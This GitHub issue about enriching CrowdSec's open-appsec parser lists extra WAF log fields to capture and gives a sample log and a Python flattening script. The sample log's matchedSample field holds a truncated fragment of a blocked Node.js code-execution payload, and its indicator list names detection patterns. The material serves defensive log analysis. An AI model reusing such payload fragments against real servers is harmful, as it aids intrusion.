Enhancing open-appsec logs in CrowdSec for better incident analysis #4313

@marnit0412-cpu

Description

The parser needed a little bit of updating, and I added a target_fqdn property to the meta object, which will be shown.

I took the presumption that httpHostName will have the information you are looking for.

If you're on the latest version of CrowdSec, running `cscli hub update && cscli hub upgrade` will download the new format, and restarting CrowdSec will start generating events with the new meta field.

Thanks! That's what I meant.

Can you also add parameters such as:

  1. httpUriPath
  2. httpUriQuery
  3. httpMethod
  4. waapFoundIndicators
  5. learnedIndicators
  6. waapUserReputationScore
  7. waapUserReputation
  8. waapUriFalsePositiveScore
  9. waapKeywordsScore
  10. waapFinalScore
  11. waapCalculatedThreatLevel
  12. eventReferenceId

These parameters will help with analyzing alerts/incidents, especially during the stage when open-appsec is in learning mode.
Below I'm sending a complete example log from open-appsec:

Details

```json
{
  "eventTime": "2026-02-13T20:10:53.367",
  "eventName": "Web Request",
  "eventSeverity": "Critical",
  "eventPriority": "High",
  "eventType": "Event Driven",
  "eventLevel": "Log",
  "eventLogLevel": "info",
  "eventAudience": "Security",
  "eventAudienceTeam": "",
  "eventFrequency": 0,
  "eventTags": [
    "Threat Prevention",
    "Web Application & API Protection"
  ],
  "eventSource": {
    "agentId": "a0af8d4e-5a98-467c-94f0-06fb384128d8",
    "eventTraceId": "",
    "eventSpanId": "",
    "issuingEngineVersion": "1.1.33-open-source",
    "serviceName": "HTTP Transaction Handler",
    "serviceId": "1",
    "assetId": "web.test.pl",
    "assetName": "web.test.pl"
  },
  "eventData": {
    "logIndex": 117,
    "eventReferenceId": "8e91f7b8-5e4b-4cf9-9424-3b88c100c703",
    "assetId": "web.test.pl",
    "assetName": "web.test.pl",
    "eventConfidence": "Very High",
    "sourceIP": "x.x.x.x",
    "httpSourceId": "x.x.x.x",
    "sourcePort": 0,
    "httpHostName": "web.test.pl",
    "httpMethod": "POST",
    "assetId": "web.test.pl",
    "assetName": "web.test.pl",
    "httpUriPath": "/",
    "httpUriQuery": "",
    "ruleId": "web.test.pl",
    "securityAction": "Prevent",
    "waapOverride": "None",
    "practiceType": "Threat Prevention",
    "practiceSubType": "Web Application",
    "ruleName": "web.test.pl",
    "practiceId": "5426d613-cd8e-4bfc-b0ed-38c1b9b35938",
    "practiceName": "local_policy/practice-prevent-and-learn",
    "waapIncidentType": "Cross Site Scripting, LDAP Injection, Path Traversal, Remote Code Execution, SQL Injection",
    "matchedSample": "var reject_bridge=arguments[1];promise.all([import('node:zlib')]).then(([zlib])=>new promise((resolve,reject)=>{try{var c=global[string.fromcharcode(66,117,102,102,101,114)].from('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",
    "matchedLocation": "body",
    "matchedParameter": "0._response._prefix",
    "waapFoundIndicators": "[', .assign(, ;, =, >, ]., all, catch(, code_execution_fast_reg_0, eval(, fn_name_pass_regex_0, from, import(, ldap_injection_regex_2, regex_postfix_1, regex_xss_3, repetition, ssti_fast_reg_4, string., string.fromcharcode, tostring(, xpath_injeciton_regex_3, xpath_injection_regex_1, }}]",
    "matchedIndicators": "[', .assign(, ;, =, >, ]., all, catch(, code_execution_fast_reg_0, eval(, fn_name_pass_regex_0, from, import(, ldap_injection_regex_2, regex_postfix_1, regex_xss_3, repetition, ssti_fast_reg_4, string., string.fromcharcode, tostring(, xpath_injeciton_regex_3, xpath_injection_regex_1, }}]",
    "learnedIndicators": "",
    "waapUserReputationScore": 183,
    "waapUserReputation": "Low",
    "waapUriFalsePositiveScore": 864,
    "waapKeywordsScore": 970,
    "reservedNgenA": 0,
    "waapFinalScore": 1000,
    "waapCalculatedThreatLevel": 4
  }
}
```

Originally posted by @marnit0412-cpu in #4307
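The following is an added example, not code from the crowdsecurity/hub open-appsec parser or from open-appsec itself. It shows what the requested enrichment amounts to in practice: flattening one open-appsec "Web Request" log into a meta object carrying the fields listed above, while handling the three things a parser author trips over in this log format. Indicator lists (waapFoundIndicators, learnedIndicators) are emitted as the string "[a, b, c]" rather than a JSON array; learnedIndicators is an empty string until learning has produced something; and eventData repeats assetId/assetName, so which value wins depends on the JSON library. Source field names are those of the log posted above; the meta key names (target_fqdn plus snake_case forms of the requested fields), the sample log (a trimmed copy of the posted event with a documentation IP substituted) and the helper names are assumptions made for this illustration.

```python
"""Flatten an open-appsec "Web Request" log into the meta fields requested above.

Added example, not code from the crowdsecurity/hub parser or from open-appsec.
Source field names come from the log posted on this page; the meta key names
are an assumption chosen for illustration.
"""
from __future__ import annotations

import json
from typing import Any

# Constructed sample: a trimmed copy of the posted event.  The repeated
# assetId/assetName keys inside eventData are kept on purpose; open-appsec emits them.
SAMPLE_LOG = r'''{
  "eventTime": "2026-02-13T20:10:53.367", "eventName": "Web Request",
  "eventSeverity": "Critical",
  "eventSource": {"assetId": "web.test.pl", "assetName": "web.test.pl"},
  "eventData": {
    "eventReferenceId": "8e91f7b8-5e4b-4cf9-9424-3b88c100c703",
    "assetId": "web.test.pl", "assetName": "web.test.pl",
    "sourceIP": "203.0.113.7", "httpHostName": "web.test.pl", "httpMethod": "POST",
    "assetId": "web.test.pl", "assetName": "web.test.pl",
    "httpUriPath": "/", "httpUriQuery": "",
    "securityAction": "Prevent",
    "practiceName": "local_policy/practice-prevent-and-learn",
    "waapFoundIndicators": "[', .assign(, ;, =, >, eval(, regex_xss_3, }}]",
    "learnedIndicators": "",
    "waapUserReputationScore": 183, "waapUserReputation": "Low",
    "waapUriFalsePositiveScore": 864, "waapKeywordsScore": 970,
    "waapFinalScore": 1000, "waapCalculatedThreatLevel": 4
  }
}'''

# meta key -> eventData key.  source_ip / target_fqdn / http_* follow common
# CrowdSec meta naming; the waap_* and learned_indicators names are assumptions.
FIELD_MAP = {
    "source_ip": "sourceIP",
    "target_fqdn": "httpHostName",
    "http_verb": "httpMethod",
    "http_path": "httpUriPath",
    "http_args": "httpUriQuery",
    "security_action": "securityAction",
    "event_reference_id": "eventReferenceId",
    "waap_found_indicators": "waapFoundIndicators",
    "learned_indicators": "learnedIndicators",
    "waap_user_reputation_score": "waapUserReputationScore",
    "waap_user_reputation": "waapUserReputation",
    "waap_uri_false_positive_score": "waapUriFalsePositiveScore",
    "waap_keywords_score": "waapKeywordsScore",
    "waap_final_score": "waapFinalScore",
    "waap_calculated_threat_level": "waapCalculatedThreatLevel",
}
LIST_FIELDS = {"waapFoundIndicators", "learnedIndicators"}
INT_FIELDS = {"waapUserReputationScore", "waapUriFalsePositiveScore",
              "waapKeywordsScore", "waapFinalScore", "waapCalculatedThreatLevel"}


def load_event(log_line: str) -> tuple[dict, list[str]]:
    """Parse one log line and report keys repeated within a single JSON object.

    json.loads keeps the last value of a repeated key; other JSON libraries keep
    the first.  Returning the repeated names lets a parser author notice a
    field that could be read differently by different tools.
    """
    repeated: set[str] = set()

    def hook(pairs: list[tuple[str, Any]]) -> dict:
        obj: dict = {}
        for key, value in pairs:
            if key in obj:
                repeated.add(key)
            obj[key] = value
        return obj

    return json.loads(log_line, object_pairs_hook=hook), sorted(repeated)


def parse_indicator_list(raw: str | None) -> list[str]:
    """Turn open-appsec's "[a, b, c]" string into a list.

    An empty string (learnedIndicators before anything was learned) and "[]"
    both become [].  An indicator that itself contains ", " cannot be told
    apart from two indicators; the format gives no way to escape it.
    """
    text = (raw or "").strip()
    if text.startswith("[") and text.endswith("]"):
        text = text[1:-1]
    return [tok for tok in text.split(", ") if tok]


def to_meta(log_line: str) -> dict:
    """Return the proposed meta object for one open-appsec event.

    Empty strings become None, indicator fields become lists and scores become
    ints, so a downstream check such as "threat level >= 3 and action was
    Prevent" compares numbers rather than strings.
    """
    event, repeated = load_event(log_line)
    data = event.get("eventData", {})
    meta: dict = {"duplicate_keys": repeated}
    for meta_key, src_key in FIELD_MAP.items():
        raw = data.get(src_key)
        if src_key in LIST_FIELDS:
            meta[meta_key] = parse_indicator_list(raw)
        elif src_key in INT_FIELDS:
            meta[meta_key] = None if raw is None else int(raw)
        else:
            meta[meta_key] = None if raw in ("", None) else raw
    return meta


if __name__ == "__main__":
    print(json.dumps(to_meta(SAMPLE_LOG), indent=2))
```

Run it as a script to see the meta object for the sample event. In a CrowdSec hub parser these values would instead be produced by `statics` entries; the point of doing it in a standalone script first is to confirm, before touching the YAML, how each field actually looks in real output: which ones arrive empty, which arrive as stringified lists, and which keys are duplicated.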
